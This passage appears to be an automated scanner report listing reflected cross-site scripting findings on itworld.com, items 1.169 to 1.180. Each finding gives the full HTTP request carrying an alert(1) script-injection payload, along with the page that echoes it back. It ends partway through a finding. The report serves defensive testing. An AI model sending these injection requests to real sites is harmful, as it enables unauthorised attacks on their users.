<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js9d8b1"><script>alert(1)</script>8806e851229?h"/>
...[SNIP]...

1.169. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/dialog/dialog.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 687ff"><script>alert(1)</script>da3ac0b9dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules687ff"><script>alert(1)</script>da3ac0b9dd3/contrib/dialog/dialog.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460145"
Content-Type: text/html; charset=utf-8
Content-Length: 57606
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:39 GMT
X-Varnish: 252446260
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules687ff"><script>alert(1)</script>da3ac0b9dd3/contrib/dialog/dialog.js?h"/>
...[SNIP]...

1.170. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/dialog/dialog.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a0f"-alert(1)-"3a8881f00e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modulesb1a0f"-alert(1)-"3a8881f00e1/contrib/dialog/dialog.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460166"
Content-Type: text/html; charset=utf-8
Content-Length: 57386
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:48 GMT
X-Varnish: 252446550
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
S";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modulesb1a0f"-alert(1)-"3a8881f00e1/contrib/dialog/dialog.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requ
...[SNIP]...

1.171. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/dialog/dialog.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e984a"><script>alert(1)</script>1bd89d8f56a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contribe984a"><script>alert(1)</script>1bd89d8f56a/dialog/dialog.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460189"
Content-Type: text/html; charset=utf-8
Content-Length: 57612
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:11 GMT
X-Varnish: 252446958
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contribe984a"><script>alert(1)</script>1bd89d8f56a/dialog/dialog.js?h"/>
...[SNIP]...

1.172. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/dialog/dialog.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b88"-alert(1)-"a6f9b0c1556 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contribc3b88"-alert(1)-"a6f9b0c1556/dialog/dialog.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460197"
Content-Type: text/html; charset=utf-8
Content-Length: 57392
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:20 GMT
X-Varnish: 252447178
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contribc3b88"-alert(1)-"a6f9b0c1556/dialog/dialog.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
...[SNIP]...

1.173. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/dialog/dialog.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d94"-alert(1)-"de90a2a06dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/dialogd0d94"-alert(1)-"de90a2a06dd/dialog.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460237"
Content-Type: text/html; charset=utf-8
Content-Length: 57385
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:59 GMT
X-Varnish: 252448290
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
gerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/dialogd0d94"-alert(1)-"de90a2a06dd/dialog.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar
...[SNIP]...

1.174. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/dialog/dialog.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d5b"><script>alert(1)</script>737b8c121b0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/dialogb6d5b"><script>alert(1)</script>737b8c121b0/dialog.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460213"
Content-Type: text/html; charset=utf-8
Content-Length: 57612
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:50 GMT
X-Varnish: 252447453
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/dialogb6d5b"><script>alert(1)</script>737b8c121b0/dialog.js?h"/>
...[SNIP]...

1.175. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/fbconnect/fbconnect.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24f2e"-alert(1)-"5b65d54afbf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib24f2e"-alert(1)-"5b65d54afbf/fbconnect/fbconnect.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460313"
Content-Type: text/html; charset=utf-8
Content-Length: 57451
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:14 GMT
X-Varnish: 1038159975
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib24f2e"-alert(1)-"5b65d54afbf/fbconnect/fbconnect.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you reques
...[SNIP]...

1.176. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/fbconnect/fbconnect.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13c05"-alert(1)-"d848e58119d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/fbconnect13c05"-alert(1)-"d848e58119d/fbconnect.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460345"
Content-Type: text/html; charset=utf-8
Content-Length: 57451
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:46 GMT
X-Varnish: 1038161001
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
ich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/fbconnect13c05"-alert(1)-"d848e58119d/fbconnect.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.e
...[SNIP]...

1.177. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/fbconnect/fbconnect.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33e40"><script>alert(1)</script>c3afb31d4f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/fbconnect33e40"><script>alert(1)</script>c3afb31d4f7/fbconnect.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460336"
Content-Type: text/html; charset=utf-8
Content-Length: 57672
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:40 GMT
X-Varnish: 1038160706
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/fbconnect33e40"><script>alert(1)</script>c3afb31d4f7/fbconnect.js?h"/>
...[SNIP]...

1.178. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/fbconnect/fbconnect.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be00b"-alert(1)-"7017441ab53 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/fbconnect/fbconnect.jsbe00b"-alert(1)-"7017441ab53?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460369"
Content-Type: text/html; charset=utf-8
Content-Length: 57452
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:11 GMT
X-Varnish: 1038161717
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
5="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/fbconnect/fbconnect.jsbe00b"-alert(1)-"7017441ab53";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.179. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/fbconnect/fbconnect.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af29d"><script>alert(1)</script>c9db96dfbf0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/fbconnect/fbconnect.jsaf29d"><script>alert(1)</script>c9db96dfbf0?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460357"
Content-Type: text/html; charset=utf-8
Content-Length: 57671
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:59 GMT
X-Varnish: 1038161381
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.jsaf29d"><script>alert(1)</script>c9db96dfbf0?h"/>
...[SNIP]...

1.180. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ae7e"-alert(1)-"e551714aab2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites5ae7e"-alert(1)-"e551714aab2/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:21:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460070"
Content-Type: text/html; charset=utf-8
Content-Length: 57679
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:21:24 GMT
X-Varnish: 398322502
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=39a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
